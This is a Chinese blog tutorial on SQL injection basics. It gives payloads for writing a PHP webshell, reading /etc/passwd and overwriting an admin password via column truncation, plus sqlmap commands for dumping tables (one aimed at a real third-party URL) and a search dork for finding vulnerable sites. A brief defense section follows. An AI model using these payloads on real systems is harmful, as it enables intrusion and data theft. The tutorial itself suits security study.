web安全:SQL注入攻击基础

最新推荐文章于 2023-07-20 19:59:42 发布
最新推荐文章于 2023-07-20 19:59:42 发布
阅读量411 收藏
点赞数
分类专栏: 安全技术 各种好玩的信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_17046291/article/details/99654687
版权

一、SQL注入攻击

1.Timing Attack

通过判断本次查询时间,验证是否存在注入漏洞
union select benchmark(100000,encode(‘hello’,‘goodbye’));

(1)如果当前数据库用户(current_user)具有写权限,那么攻击者还可以将信息写入本地磁盘中。比如写入Web目录中,攻击者就有可能下载这些文件:

Union All SELECT table_name, table_type, engine FROM information_schema.tables WHEREtable_schema = ‘mysql’ ORDER BY table_name DESC INTO OUTFILE’/path/location/on/server/www/schema.txt’

(2)此外,通过Dump文件的方法,还可以写入一个webshell:

1170 UNION SELECT “<? system($_REQUEST['cmd']); ?>”,2,3,4 INTO OUTFILE"/var/www/html/temp/c.php" --”

2.获取数据版本,如果对会返回true

and substring(@@version,1,1)=4

3.union select 1,1, LOAD_FILE(’/etc/passwd’),1,1;
4.攻击存储过程
5.SQLColumn Truncation攻击,数据库默认设置,导致发生插入数据截断,

例如:插入数据{“admin大量空格abc”+“newpasswd”};一旦被截断成功插入数据库则数据库中会新增用户admin,newpasswd,成功修改了用户密码

二、SQLMAP注入工具基本命令

1.基本注入检验

sqlmap -u “http://testphp.vulnweb.com/artists.php?artist=1”

2.如果网站需要cookie

sqlmap -u “http://research.baidu.com/People/index-view?id=121” --cookie=“ID=1234”

3.获取所有数据库

sqlmap -u “http://testphp.vulnweb.com/artists.php?artist=1” --dbs --batch

4.获取当前数据库

sqlmap -u “http://testphp.vulnweb.com/artists.php?artist=1” --current-db --batch

5.获取当前数据库中的所有数据表

sqlmap -u “http://testphp.vulnweb.com/artists.php?artist=1” -D acuart --tables --batch

6.获取当前数据库,某个数据表,所有字段信息

sqlmap -u “http://testphp.vulnweb.com/artists.php?artist=1” -D acuart -T users --columns --batch

7.获取当前数据库,某个数据表users 所有数据

sqlmap -u “http://testphp.vulnweb.com/artists.php?artist=1” -D acuart --dump -T users --batch

8.获取当前数据库,某个数据表users 某个字段的所有数据

sqlmap -u “http://testphp.vulnweb.com/artists.php?artist=1” -D acuart -T users -C “name,uname” --dump --batch

备注:

–batch 全部使用默认,不需要用户输入
–dump 如果换成了 --dump-all则导出全部的数据

三、寻找目标网站

输入google,或baidu查询语句:inurl:“news.php?id=”。可以加上一些后缀来限定那个国家的。

四、如何防御

1.代码使用预编译sql语句,或者使用存储过程
2.检查用户输入的数据类型、数据格式等:例如id必须是整形,不许是字符+手机号格式检查+邮箱号格式检查

数据与代码分离原则

五、补充,其它注入攻击方式

1.XML注入攻击,类似,用户构造恶意语句
2.代码注入

源代码如下:
“$myvar = “varname”;
$x = $_GET[‘arg’];
eval("$myvar = $x;");”

用户
/index.php?arg=1; phpinfo()

3.CRLF注入
硬核Top
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
xray与burpsuite联动——详细说明加举例复现sql注入漏洞
记录并分享学习安全的知识点..
01-14 1529
一、xray配置代理 awvs 的爬虫很好用,支持表单分析和单页应用的爬取,xray 的扫描能力比较强,速度也更快。awvs 和 xray 搭配使用则是如虎添翼,上两章已经主要介绍过了,有不理解的小伙伴可以参考。 xray——详细使用说明(一)_xiaofengdada的博客-CSDN博客 xray——详细使用说明(二)_xiaofengdada的博客-CSDN博客 这里演示的是扫描 我的个人漏洞靶场,首先启动 xray 的被动代理,下面的命令将启动一个监听在所有网卡 7777 端口的 HTTP 代
Xray基础使用介绍
weixin_44805159的博客
10-10 1万+
官方使用文档:https://docs.xray.cool/#xray简介xray 是一款功能强大的安全评估工具,由多名经验丰富的一线安全从业者呕心打造而成,主要特性有: 检测速度快。发包速度快; 漏洞检测算法高效。 支持范围广。大至 OWASP Top 10 通用漏洞检测,小至各种 CMS 框架 POC,均可以支持。 代码质量高。编写代码的人员素质高, 通过 Code Review、单元测试、集成测试等多层验证来提高代码可靠性。 高级可定制。通过配置文件暴露了引擎的各种参数,通过修改配置文件可以极大的客
SQL手工注入网站笔记
swaggy_tt的博客
12-03 690
SQL手工注入网站笔记 目标网站:http://testphp.vulnweb.com/listproducts.php?cat=1 1.判断注入点: http://testphp.vulnweb.com/listproducts.php?cat=1’ http://testphp.vulnweb.com/listproducts.php?cat=1 and 1=1 永真条件,回显正常 http://testphp.vulnweb.com/listproducts.php?cat=1 and 1=2 永假
Xray扫描器
热门推荐
秋水的博客
10-06 3万+
简介 xray是一款可以使用HTTP/HTTPS代理进行被动扫描的安全工具,支持功能如下 独立的 URL 扫描 基于 HTTP 的被动代理扫描,同时支持HTTPS SQL注入检测模块 命令注入检测模块 任意重定向检测模块 路径遍历模块 Xray扫描器内置插件 XSS漏洞检测 (key: xss):利用语义分析的方式检测XSS漏洞 SQL 注入检测 (key: sqldet...
SQL注入攻击——sqlmap的使用
m0_57069925的博客
06-03 3918
所谓SQL注入攻击,就是攻击者把SQL命令插入到Web表单的输入域或页面请求的查询字符串,欺骗服务器执行恶意的SQL命令。数据库都是Web应用环境中非常重要的环节。SQL命令就是前端Web和后端数据库之间的接口,使得数据可以传递到Web应用程序,也可以从其中发送出来。需要对这些数据进行控制,保证用户只能得到授权给他的信息。可是,很多Web站点都会利用用户输入的参数动态的生成SQL查询要求,攻击者通过在URL、表格域,或者其他的输入域中输入自己的SQL命令,以此改变查询属性,骗过应用程序,从而可以对数据库进
Web安全SQL注入攻击
03-04
①这个晨讲我构思了两个星期,但是之前电脑坏了,一直拖...今天由我给大家带来《web安全SQL注入篇》系列晨讲,首先对课程进行简单介绍,SQL注入篇一共分为三讲:第一讲:“纸上谈兵:我们需要在本地架设注入环境,构
Web安全开发:SQL注入攻击和网页挂马.pdf
09-19
* Time-based SQL注入攻击攻击者通过inject恶意的SQL代码,利用时间差异来获取敏感数据。 * Boolean-based SQL注入攻击攻击者通过inject恶意的SQL代码,利用布尔值来获取敏感数据。 4. SQL注入攻击的危害 SQL...
渗透练习 Vulnhub靶场 Tornado
hljzzj的博客
02-15 2144
No.27 Tornado 靶机信息 下载地址: https://www.vulnhub.com/entry/ia-tornado,639/ 靶场: VulnHub.com 靶机名称: IA: Tornado 难度: 中等 发布时间: 2020年12月20日 提示信息: 无 目标: user.txt和root.txt 实验环境 攻击机:VMware kali 192.168.7.3 靶机:Vbox linux IP自动获取 信息收集 扫描主机 扫描局域网内的靶机IP地址 sudo nmap -
sql注入攻击的原理(sql注入攻击防范)
weixin_45901902的博客
08-19 2万+
SQL 注入(SQLi)是一种可执行恶意 SQL 语句的注入攻击。这些 SQL 语句可控制网站背后的数据库服务。攻击者可利用 SQL 漏洞绕过网站已有的安全措施。他们可绕过网站的身份认证和授权并访问整个 SQL 数据库的数据。他们也可利用 SQL 注入对数据进行增加、修改和删除操作。 SQL 注入可影响任何使用了 SQL 数据库的网站或应用程序,例如常用的数据库有 MySQL、Oracle、SQL Server 等等。攻击者利用它,便能无需授权地访问你的敏感数据,比如:用户资料、个人数据、商业机密、知识产
sql注入基础原理及注入方式
最新发布
A906003660的博客
07-20 1203
Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器上解析执行进行的攻击,它目前黑客对数据库进行攻击的最常用手段之一。二、 SQL注入的简单流程第一步:判断目标站点,是否存在注入漏洞向页面传入一些指令(SQL语句,检查指令是否被执行,如果被执行,说明页面是可能存在SQL注入漏洞的;如果不能被执行,说明可能不存在SQL注入漏洞常用的闭合点: ''单引号""双引号第二步判断数据表的字段数量思路: order by字段编号。
SQL注入攻击(基础)
scholar_1的博客
07-08 1201
书生这次准备了一份sql注入攻击的靶场演练教程以封神台在线演练靶场为例(像游戏一样一关关过),就说第一章吧题目如下:要求是通过sql注入来获得管理员的密码点击传送门,出现这样一个网页:那么,第一步,确定目标,这里是: 接下来第二步,来判断这里是否存在SQL注入的漏洞开始操作: 看来,页面返回正常,接着下一个 看,页面返回不正常了,所以我判断,这里可能会存在一个SQL注入漏洞好,开始第三步,判断他有多少字段一步步来,从1开始试探 可以看到页面显示正常,接下来,测2 页面返回正常,然
2021年上半年软件设计师上午真题及答案解析
鹏鹏程序员的博客
06-14 7692
2021年上半年软件设计师上午真题及答案解析
Sql注入基础原理介绍(超详细)
weixin_30325487的博客
09-06 4315
一、Sql注入简介 Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器上解析执行进行的攻击,它目前黑客对数据库进行攻击的最常用手段之一。 二、Web 程序三层架构 三层架构(3-tier architecture) 通常意义上就是将整个业务应用划分为: 界面层(User Interface layer) 业务逻辑层(Business Logic...
Web安全渗透OWASP-DVWA-SQL注入攻击
lx1315998513的博客
12-13 2679
SQL注入攻击 在owasp年度top10安全问题中,注入高居榜首,SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者索要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。 一、回顾SQL语句 1.登陆owasp mysql -uroot -powaspbwa -u账户,-p密码...
CISSP AIO7 学习笔记 - 第三章 安全工程 3.4-3.10小节
baynk的博客
05-05 1029
感觉看书好慢,还是上课的时候学东西快一些,给人讲一遍,抵得过看好几遍。。。 看一遍实体书,慢,非常慢,特别慢! 然后来写写博客记笔记,对着电子书来看,算是第二遍。 最后还需要写思维导图,第三遍了吧。 如果算上学习过程中,翻看讲解视频和讲义的话,至少5遍起了。。。 学习真是一件xxx的事情 3.4 系统安全框架 安全从制定策略开始,安全策略是高级的指导性纲领。 安全策略是战略工具,指明了敏感信息和...
什么是SQL注入攻击?
南_茗的博客
05-18 4258
所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。
WEB安全渗透测试》(10)SQL注入实战:XFF注入
午夜安全
10-24 9985
WEB安全渗透测试》(10)SQL注入实战:XFF注入 X-Forwarded-For简称XFF头,它代表了客户端的真实IP,通过修改他的值就可以伪造客户端IP。1)判断是否存在注入使用Burp的Repeater模块对请求进行修改,分别修改X-Forwarded-For的值如下所示:X-Forwarded-for: 127.0.0.1X-Forwarded-for: 127.0.0.1’X-Forwarded-for: 127.0.0.1' and 1=1#......
CISSP复习笔记-第4章 安全架构和设计
mvpboss1004的博客
11-21 4241
CISSP复习笔记-第4章 安全架构和设计4.2 系统架构 ISO/IEC 42010:2007:IEEE推荐的软件密集型系统架构描述 4.3 计算机架构4.3.1 中央处理单元(Central Processing Unit,CPU) 算术逻辑单元(Arithmetic Logic Unit,ALU) 控制单元 通用寄存器:用于保存变量和临时结果 特殊寄存器 程序计数器 栈指针 程序状态字(Pr
sql注入攻击详解(原理理解)
~ Caesar's wish书屋 ~
12-14 3万+
前段时间,在很多博客和微博中暴漏出了12306铁道部网站的一些漏洞,作为这么大的一个项目,要说有漏洞也不是没可能,但其漏洞确是一些菜鸟级程序员才会犯的错误。其实sql注入漏洞就是一个。作为一个菜鸟小程序员,我对sql注入的东西了解的也不深入,所以抽出时间专门学习了一下。现在把学习成果分享给大家,希望可以帮助大家学习。下面我们就来看一下。 一、什么是sql注入呢?    
深入理解Web安全SQL注入攻击进阶教程
这些服务器被用于模拟真实的网络环境,以便学习者可以实践SQL注入攻击。 在实验步骤中,学习者被引导启动实验虚拟机,并通过`ifconfig`(在Linux系统)和`ipconfig`(在Windows系统)命令获取渗透测试机...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值